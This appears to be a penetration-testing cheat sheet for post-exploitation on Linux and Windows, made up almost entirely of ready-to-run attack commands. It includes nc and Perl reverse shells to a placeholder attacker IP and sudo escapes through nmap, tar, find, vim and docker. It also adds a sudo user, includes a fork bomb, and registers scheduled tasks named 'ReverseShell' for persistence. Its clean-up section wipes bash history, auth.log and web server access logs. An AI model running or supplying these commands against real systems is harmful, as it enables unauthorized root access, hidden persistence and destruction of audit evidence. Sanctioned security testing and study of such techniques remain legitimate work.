Offensive Security Testing Guide - Post Exploitation
Operating System
Windows
Interesting Pathdir %USERPROFILE%
dir "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
Information Gathering
Check IP Informationhttps://www.localizaip.com.br/api/iplocation.php
Privilege Escalation - Linux
Reference:https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
C Compiler
gcc <exploit>.c -o <exploit> 2>&1
Troubleshooting
Path environment variable
echo $PATH
export PATH=$PATH:<executable_file_path>
Nmap
sudo nmap --interactive
!sh
Schedule/Cron Job
cat /etc/crontab
Linux (Sudo -l)
sudo -l
sudo -su
bash shell (.sh) file
#!/bin/sh
/bin/bash
#!/bin/sh
rm /tmp/fa; mkfifo /tmp/fa; cat /tmp/fa|/bin/sh -i 2>&1|nc <attacker_ip_address> 8099 > /tmp/fa
TARecho "dummy" > dummy.txt
tar cf compress.tar dummy.txt
sudo tar -xf compress.tar --checkpoint=1 --checkpoint-action=exec='echo $(id)'
sudo tar -xf archive.tar --checkpoint=1 --checkpoint-action=exec='/bin/bash'
Perlsudo perl -e 'use Socket;$i="<attacker_ip_address>";$p=8099;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
findsudo find /home -exec sh -i \;
Privileged Usersudo -u <privileged user> bash -i
Linux (Sudo -i)
Current user is part of the sudoers groupsudo -i
Linux (SUID)
find / -user root -perm -4000 -print 2>/dev/null
find / -perm +6000 22> /dev/null
Vim.basic
vim.basic /etc/sudoers
vim.basic /root/.bashrc
adduser <username> sudo #add at the bottom
:(){ :|: & };: #fork bomb
sudo bash
Linux (Interesting Directory/File)
ls /etc/cron.daily
Docker
docker run -it -v /:/opt bash bash
Privilege Escalation - Windows
Task Scheduler
Ref: https://github.com/SocialEngineeringNeo/Exploits/blob/master/Our%20Exploits/Microsoft/taskschdEoP_PoC.ps1Windows 7 or below
Import-Module PSScheduledJob
$trigger = New-JobTrigger -Daily -At 9pm
Register-ScheduledJob -Name "ReverseShell" -FilePath 'C:\Users\axcelsec\Documents\payload.exe' -Description "This Task Will Run the Reverse Shell." -Trigger $trigger
Windows 8 or above
Import-Module ScheduledTasks
$action = New-ScheduledTaskAction -Execute 'C:\Users\axcelsec\Documents\payload.exe'
$trigger = New-ScheduledTaskTrigger -Daily -At 9pm
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "ReverseShell" -Description "This Task Will Run the Reverse Shell."
Clean Up
echo '' > /home/<username>/.bash_history
echo '' > /root/.bash_history
echo '' > /var/log/auth.log
echo '' > /<path_to_apache_server>/access.log
history -c && kill -9 $$